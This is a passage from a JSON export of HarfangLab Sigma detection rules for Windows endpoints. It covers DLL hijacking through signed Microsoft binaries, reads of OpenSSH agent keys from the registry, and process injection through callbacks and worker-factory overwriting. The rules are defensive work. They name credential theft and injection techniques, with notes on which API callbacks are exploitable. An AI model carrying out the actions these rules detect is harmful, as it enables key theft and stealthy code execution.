ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e810a8d7-5996-42a2-9fb8-44861142fdb2",
"rule_name": "DLL Hijacking via systempropertiesdataexecutionprevention.exe",
"rule_description": "Detects potential Windows DLL Hijacking via systempropertiesdataexecutionprevention.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e83d7b78-1e43-40d7-8800-306e1ec12054",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098099Z",
"creation_date": "2026-03-23T11:45:34.098102Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098109Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dfsutil.yml",
"content": "title: DLL Hijacking via Dfsutil.exe\nid: e83d7b78-1e43-40d7-8800-306e1ec12054\ndescription: |\n Detects potential Windows DLL Hijacking via Dfsutil.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Dfsutil.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\netapi32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e83d7b78-1e43-40d7-8800-306e1ec12054",
"rule_name": "DLL Hijacking via Dfsutil.exe",
"rule_description": "Detects potential Windows DLL Hijacking via Dfsutil.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e8559b97-e738-4a06-9a9b-817401d64936",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589338Z",
"creation_date": "2026-03-23T11:45:34.589342Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589350Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msicert.yml",
"content": "title: DLL Hijacking via MsiCert.exe\nid: e8559b97-e738-4a06-9a9b-817401d64936\ndescription: |\n Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiCert.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/04\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MsiCert.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\msi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 
1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e8559b97-e738-4a06-9a9b-817401d64936",
"rule_name": "DLL Hijacking via MsiCert.exe",
"rule_description": "Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiCert.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-11-04",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e8880433-d351-4c68-ab08-ca979b1ad178",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074784Z",
"creation_date": "2026-03-23T11:45:34.074786Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074791Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/",
"https://attack.mitre.org/techniques/T1552/002/",
"https://attack.mitre.org/techniques/T1552/004/"
],
"name": "t1003_002_susp_registry_read_openssh_keys.yml",
"content": "title: OpenSSH Agent Keys Read from Registry\nid: e8880433-d351-4c68-ab08-ca979b1ad178\ndescription: |\n Detects a suspicious read operation on registry keys storing SSH keys when using an OpenSSH agent.\n Adversaries may try to steal SSH keys in order to move laterally within the information system.\n It is recommended to check whether the process accessing the registry keys has legitimate reasons to do it.\nreferences:\n - https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/\n - https://attack.mitre.org/techniques/T1552/002/\n - https://attack.mitre.org/techniques/T1552/004/\ndate: 2024/04/02\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.002\n - attack.t1552.004\n - attack.discovery\n - attack.t1012\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'ReadValue'\n TargetObject|startswith: 'HKU\\\\*\\SOFTWARE\\OPENSSH\\AGENT\\KEYS\\\\*'\n\n filter_ssh_agent:\n Image:\n - '?:\\Windows\\System32\\OpenSSH\\ssh-agent.exe'\n - '?:\\Program Files\\OpenSSH-Win64\\ssh-agent.exe'\n - '?:\\Program Files\\OpenSSH\\ssh-agent.exe'\n - '?:\\Program Files (x86)\\OpenSSH-Win64\\ssh-agent.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n exclusion_setuphost:\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e8880433-d351-4c68-ab08-ca979b1ad178",
"rule_name": "OpenSSH Agent Keys Read from Registry",
"rule_description": "Detects a suspicious read operation on registry keys storing SSH keys when using an OpenSSH agent.\nAdversaries may try to steal SSH keys in order to move laterally within the information system.\nIt is recommended to check whether the process accessing the registry keys has legitimate reasons to do it.\n",
"rule_creation_date": "2024-04-02",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1012",
"attack.t1552.002",
"attack.t1552.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e88a2dea-c3ee-4daa-8004-6cfa83f2363f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587296Z",
"creation_date": "2026-03-23T11:45:34.587299Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587307Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fondue.yml",
"content": "title: DLL Hijacking via fondue.exe\nid: e88a2dea-c3ee-4daa-8004-6cfa83f2363f\ndescription: |\n Detects potential Windows DLL Hijacking via fondue.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fondue.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\msi.dll'\n - '\\osbaseln.dll'\n - '\\PROPSYS.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e88a2dea-c3ee-4daa-8004-6cfa83f2363f",
"rule_name": "DLL Hijacking via fondue.exe",
"rule_description": "Detects potential Windows DLL Hijacking via fondue.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e8a8f8bb-6e74-4ca2-872c-0b570f794072",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079635Z",
"creation_date": "2026-03-23T11:45:34.079637Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079641Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/@s12deff/execute-code-via-enumchildwindows-callback-c6cc986a05b0",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_remote_thread_callback_function.yml",
"content": "title: Remote Thread Created via a Callback Function\nid: e8a8f8bb-6e74-4ca2-872c-0b570f794072\ndescription: |\n Detects a remote thread starting a function calling a callback.\n Adversaries may inject malicious code in a remote process and use a function calling a callback to circumvent a direct call to their injected code when creating a remote thread.\n It is recommended to check for suspicious behavior by both injecting and injected processes.\nreferences:\n - https://medium.com/@s12deff/execute-code-via-enumchildwindows-callback-c6cc986a05b0\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/09/10\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: remote_thread\ndetection:\n selection:\n StartFunction|startswith:\n # can be exploited\n - 'EnumWindowStations'\n - 'EnumWindows'\n - 'EnumPwrSchemes' # win2003\n - 'EnumPageFiles'\n\n # probably exploitable if prerequisite\n - 'SymEnumProcesses' # need SymInitialize before\n - 'FlsAlloc' # then FlsSetValue\n - 'SwitchToFiber' # strange\n\n # probably exploitable with callback 1st\n - 'EnumUILanguages'\n - 'EnumLanguageGroupLocales'\n - 'EnumCalendarInfo'\n - 'EnumTimeFormatsEx'\n - 'EnumSystemLocalesEx'\n\n # probably not exploitable\n - 'EnumThreadWindows'\n - 'EnumResourceTypes'\n - 'EnumProps'\n - 'EnumObjects'\n - 'EnumICMProfiles'\n - 'EnumFonts'\n - 'EnumFontFamilies'\n - 'EnumerateLoadedModules'\n - 'EnumDisplayMonitors'\n - 'EnumDirTreeW'\n - 'EnumDesktopWindows'\n - 'GetThreadDesktop'\n - 'EnumDesktops'\n - 'EnumChildWindows'\n - 'CryptEnumOIDInfo'\n - 'CopyFile'\n - 'CertEnumSystemStore'\n - 'CertEnumSystemStoreLocation'\n - 'VerifierEnumResource'\n - 'SymEnumSourceFiles'\n - 'SymFindFileInPath'\n - 'SetupCommitFileQueueW'\n - 'SetTimer'\n - 
'LdrEnumerateLoadedModules'\n - 'InitOnceExecuteOnce'\n - 'ImmEnumInputContext'\n - 'ImageGetDigestStream'\n\n # strange but seen itw\n - 'Thread32Next'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e8a8f8bb-6e74-4ca2-872c-0b570f794072",
"rule_name": "Remote Thread Created via a Callback Function",
"rule_description": "Detects a remote thread starting a function calling a callback.\nAdversaries may inject malicious code in a remote process and use a function calling a callback to circumvent a direct call to their injected code when creating a remote thread.\nIt is recommended to check for suspicious behavior by both injecting and injected processes.\n",
"rule_creation_date": "2024-09-10",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e8ab1ba0-0993-4c90-bbba-d1f1de486df6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096242Z",
"creation_date": "2026-03-23T11:45:34.096244Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096248Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_licensingui.yml",
"content": "title: DLL Hijacking via Licensing.exe\nid: e8ab1ba0-0993-4c90-bbba-d1f1de486df6\ndescription: |\n Detects potential Windows DLL Hijacking via Licensing.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'LicensingUI.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\dui70.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e8ab1ba0-0993-4c90-bbba-d1f1de486df6",
"rule_name": "DLL Hijacking via Licensing.exe",
"rule_description": "Detects potential Windows DLL Hijacking via Licensing.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e8bd72ec-7cea-45b6-bbcb-62c2c429ce00",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071051Z",
"creation_date": "2026-03-23T11:45:34.071053Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071058Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.safebreach.com/blog/process-injection-using-windows-thread-pools/",
"https://thehackernews.com/2023/12/new-poolparty-process-injection.html",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_worker_factory_startroutine_overwrite_injection.yml",
"content": "title: Process Injection via Worker Factory Start Routine Overwriting\nid: e8bd72ec-7cea-45b6-bbcb-62c2c429ce00\ndescription: |\n Detects a process injection by overwriting the Worker Factory Start Routine function. This technique is also known as 'PoolParty'.\n All processes in Windows have a User Mode Thread Pool by default. This pool contains Worker Threads responsible for executing code.\n A Worker Factory is the Kernel Mode object responsible for managing these Worker Threads.\n The Start Routine is the function pointer present in the Worker Factory structure that serves as the entry point for Worker Threads. This routine normally serves as the Thread Pool scheduler, responsible for dequeuing and executing work items.\n Adversaries may overwrite the Start Routine pointer address with malicious code and force the creation of a new thread, effectively executing their code inside of a new process.\n It is recommended to investigate the activities of both the injecting and target processes to determine legitimacy.\nreferences:\n - https://www.safebreach.com/blog/process-injection-using-windows-thread-pools/\n - https://thehackernews.com/2023/12/new-poolparty-process-injection.html\n - https://attack.mitre.org/techniques/T1055/\ndate: 2023/12/12\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProcessInjection\nlogsource:\n product: windows\n category: remote_thread\ndetection:\n selection:\n # We look for exported functions that are located near this exported symbol\n StartFunction|startswith: 'TpReleaseCleanupGroupMembers'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e8bd72ec-7cea-45b6-bbcb-62c2c429ce00",
"rule_name": "Process Injection via Worker Factory Start Routine Overwriting",
"rule_description": "Detects a process injection by overwriting the Worker Factory Start Routine function. This technique is also known as 'PoolParty'.\nAll processes in Windows have a User Mode Thread Pool by default. This pool contains Worker Threads responsible for executing code.\nA Worker Factory is the Kernel Mode object responsible for managing these Worker Threads.\nThe Start Routine is the function pointer present in the Worker Factory structure that serves as the entry point for Worker Threads. This routine normally serves as the Thread Pool scheduler, responsible for dequeuing and executing work items.\nAdversaries may overwrite the Start Routine pointer address with malicious code and force the creation of a new thread, effectively executing their code inside of a new process.\nIt is recommended to investigate the activities of both the injecting and target processes to determine legitimacy.\n",
"rule_creation_date": "2023-12-12",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e90145a1-9e20-4937-ad01-c8777f3af8c6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622786Z",
"creation_date": "2026-03-23T11:45:34.622788Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622792Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1049/",
